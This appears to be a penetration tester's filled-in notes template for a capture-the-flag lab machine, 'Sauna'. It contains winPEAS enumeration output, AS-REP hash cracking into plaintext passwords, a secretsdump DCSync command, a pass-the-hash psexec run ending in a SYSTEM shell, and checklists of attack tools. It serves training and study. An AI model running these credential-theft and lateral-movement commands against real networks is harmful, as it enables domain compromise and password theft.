AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials

[+] Looking SSClient.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#scclient-sccm
Not Found

[+] Checking AlwaysInstallElevated(T1012)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated isn't available

[+] Checking WSUS(T1012)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
Not Found

========================================(Browsers Information)========================================

[+] Looking for Firefox DBs(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
Not Found

[+] Looking for GET credentials in Firefox history(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
Not Found

[+] Looking for Chrome DBs(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
Not Found

[+] Looking for GET credentials in Chrome history(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
Not Found

[+] Chrome bookmarks(T1217)
Not Found

[+] Current IE tabs(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
[X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A)
   --- End of inner exception stack trace ---
   at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)
   at winPEAS.KnownFileCredsInfo.GetCurrentIETabs()
Not Found

[+] Looking for GET credentials in IE history(T1503)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history

[+] IE favorites(T1217)
Not Found

==============================(Interesting files and registry)==============================

[+] Putty Sessions()
Not Found

[+] Putty SSH Host keys()
ssh-ed25519@22:10.10.14.10:
=================================================================================================

[+] SSH keys in registry()
[?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-in-registry
Not Found

[+] Cloud Credentials(T1538&T1083&T1081)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Not Found

[+] Unnattend Files()

[+] Powershell History()

[+] Looking for common SAM & SYSTEM backups()
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM

[+] Looking for McAfee Sitelist.xml Files()

[+] Cached GPP Passwords()
[X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.

[+] Looking for possible regs with creds(T1012&T1214)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry
Not Found
Not Found
Not Found
Not Found

[+] Looking for possible password files in users homes(T1083&T1081)
[?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml

[+] Looking inside the Recycle Bin for creds files(T1083&T1081&T1145)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Not Found

[+] Searching known files that can contain creds in home(T1083&T1081)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files

[+] Looking for documents --limit 100--(T1083)
Not Found

[+] Recent files --limit 70--(T1083&T1081)
Not Found

Script Results
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
  - Checking if domain...
  - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()
   at System.Management.Man

Running Processes
Process List

File System
Writeable Files\Directories
Directory List

Host Information
Operating System
Architecture
Domain
Installed Updates

Network
IPConfig\IFConfig
Network Processes
ARP
DNS
Route

Users & Groups
Users
/usr/bin/impacket-

Installed Applications
Installed Applications

Goodies

Priv Escalation
Service Exploited:
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
Proof\Local.txt File ☐

Priv Escalation
Service Exploited:

Scheduled Jobs
Scheduled Tasks

Hashes
$ cat npu_out.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:20bd5c190cedef6b5d04fd60bae4b3ba$86a4dc0a71d48b8a4f98db4771c8d6dc71b8ad0af863acd6beeb940462 dcedacb43246a2ca0d794485f0a82a000883c9621dddfa813c40448f20448cb3ce642613c5c01d4d68c5ab0c402c98093cc121af18377ae1

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./npu_out.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:11 DONE (2020-08-03 19:22) 0.09041g/s 952894p/s 952894c/s 952894C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Proof\Flags\Other
C:\Windows\system32>type C:\Users\fsmith\Desktop\user.txt
1b5520b98d97cf17f24122a55baf70cf

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
f3ee04965c68257382e31502cc5e881f

Software Versions
Software 
Versions
Potential Exploits

Passwords
fsmith:Thestrokes23
svc_loanmgr:Moneymakestheworldgoround!

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
Nikto
dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test

Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux

Anything Else
nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files

secretsdump -just-dc-ntlm egotisticalbank/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up...

Groups

Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
python3 /usr/share/doc/python3-impacket/examples/psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file BfdjSbpN.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service zBSJ on 10.10.10.175.....
[*] Starting service zBSJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
SAUNA

C:\Windows\system32>ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::80ac:2dec:28a4:a668
   Link-local IPv6 Address . . . . . : fe80::80ac:2dec:28a4:a668%8
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f9ab%8
                                       10.10.10.2

C:\Windows\system32>type C:\Users\fsmith\Desktop\user.txt
1b5520b98d97cf17f24122a55baf70cf

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
f3ee04965c68257382e31502cc5e881f

C:\Windows\system32>

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Log Book

Methodology
Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree